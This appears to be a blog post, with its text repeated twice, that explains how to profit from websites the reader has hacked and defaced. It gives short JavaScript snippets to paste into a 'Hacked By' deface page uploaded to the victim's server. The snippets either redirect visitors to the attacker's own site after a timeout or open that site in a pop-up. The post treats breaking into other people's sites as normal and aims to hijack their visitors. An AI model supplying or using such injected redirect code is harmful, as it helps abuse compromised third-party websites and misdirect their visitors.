When Your Have Low Traffic on website/blog You can Get Traffic from Your defaced website. Just redirect the Defaced website on your Main website.
![301-redirect.png (200×200)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNy9YwGEno6M-q1Rj-Z-JHtU_e6xmKOUuiExlp-QsoBiuKNxDrW1Ma3BzAhyGcXw-qbcGH2MJ0aLoGww5s63HT9k2z3AYiJrVb3vtOS73r6fjh_wQe5dM2OxequeWolwkTUt6UnjEMRT8/s1600/301-redirect.png)
How To Redirect Defaced Website On your Website ???
For Redirecting hacked website to your website open the deface Page with Notepad And paste this code Anywhere, But closed the <> Properly
Code :-
</SCRIPT><script> delayRedirect('http://www.xxx.in/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script>
(replace devilscafe.in with your own website)
Example :-
<html><title>--==[[ Hacked By ABC ]]==--</title>
Find this code in Your deface page and Paste the code just after This code
Example :-
<html><title>--==[[ Hacked By ABC ]]==--</title></SCRIPT><script> delayRedirect('http://www.xxx.in/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script>
Now save The Deface page and Upload on Defaced website :) The website will be redirect on your website !
How To Add A Pop Up and Open Your website in a New window
If you want to Open Your website In a New Window (Pop-up) Paste this code
<script language="javascript">
window.open('http://www.xxx.in/','','width=700,height=600')
</script> after </title>
Example :-
<html><title>--==[[ Hacked By ABC ]]==--</title> <script language="javascript">
window.open('http://www.xxx.in/','','width=700,height=600')
</script>
![301-redirect.png (200×200)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNy9YwGEno6M-q1Rj-Z-JHtU_e6xmKOUuiExlp-QsoBiuKNxDrW1Ma3BzAhyGcXw-qbcGH2MJ0aLoGww5s63HT9k2z3AYiJrVb3vtOS73r6fjh_wQe5dM2OxequeWolwkTUt6UnjEMRT8/s1600/301-redirect.png)
How To Redirect Defaced Website On your Website ???
For Redirecting hacked website to your website open the deface Page with Notepad And paste this code Anywhere, But closed the <> Properly
Code :-
</SCRIPT><script> delayRedirect('http://www.xxx.in/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script>
(replace devilscafe.in with your own website)
Example :-
<html><title>--==[[ Hacked By ABC ]]==--</title>
Find this code in Your deface page and Paste the code just after This code
Example :-
<html><title>--==[[ Hacked By ABC ]]==--</title></SCRIPT><script> delayRedirect('http://www.xxx.in/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script>
How To Add A Pop Up and Open Your website in a New window
If you want to Open Your website In a New Window (Pop-up) Paste this code
<script language="javascript">
window.open('http://www.xxx.in/','','width=700,height=600')
</script> after </title>
Example :-
<html><title>--==[[ Hacked By ABC ]]==--</title> <script language="javascript">
window.open('http://www.xxx.in/','','width=700,height=600')
</script>
No comments:
Post a Comment